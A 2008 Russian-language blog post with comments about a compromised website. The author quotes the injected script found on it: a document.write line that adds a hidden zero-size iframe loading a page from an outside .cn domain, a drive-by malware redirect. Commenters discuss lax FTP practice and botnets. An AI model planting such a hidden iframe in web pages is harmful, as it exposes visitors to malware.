November 2019

S M T W T F S
      12
34 5 678 9
10111213141516
17181920212223
24252627282930

Navigation

Page Summary

Style Credit

Expand Cut Tags

No cut tags

Спасибо товарищу Сталину за наше счастливое детство

dil: (Default)
[personal profile] dil
Monday, April 28th, 2008 02:50 pm


не, спасибо за предупреждение, конечно, но если я всё-таки хочу туда попасть?

Upd: в общем-то, туда ходить действительно не стОит, потому что ничего хорошего вот это не принесёт:
document.write('<iframe src="http:// xanjan .cn/in.cgi?mytraf" width=0 height=0 frameborder=0 style="display:none" onLoad="status=defaultStatus;"></iframe>
Что не отменяет вышенаписанного.
Tags:
Flat | Top-Level Comments Only

[identity profile] cybernatic-cat.livejournal.com
Monday, April 28th, 2008 07:48 pm (UTC)
Это я понимаю. Но мне непонятно, в какую сторону смотрят авторы движка сайта и его админы. И откуда у них растут руки.

[identity profile] dixi.livejournal.com
Monday, April 28th, 2008 07:52 pm (UTC)
ну нет пока что стандартных систем для контроля целостности серверного кода.
а распространённая практика прямого выкладывания на сайт по фтп очень удобна ботнетчикам.

[identity profile] cybernatic-cat.livejournal.com
Monday, April 28th, 2008 07:59 pm (UTC)
Угу, лично я разработчиков нашего сайта натурально заебался пинать: "Закачал очередное файло - ЗАКРОЙ FTP-ПОРТЫ НА ФАЙРВОЛЛЕ, для того тебе и дан sudo!!"
Как о стенку горохом. Такое ощущение, что web-разработчики зачастую просто не понимают самых тривиальных вещей...

[identity profile] dixi.livejournal.com
Monday, April 28th, 2008 08:02 pm (UTC)
ну, в случае с шаред хостингом никаких портов ни на каком файрволле ни у кого нет.

[identity profile] dil.livejournal.com
Tuesday, April 29th, 2008 06:57 am (UTC)
ну дык вот, например.. http://bugtraq.ru/rsn/archive/2008/04/14.html
Flat | Top-Level Comments Only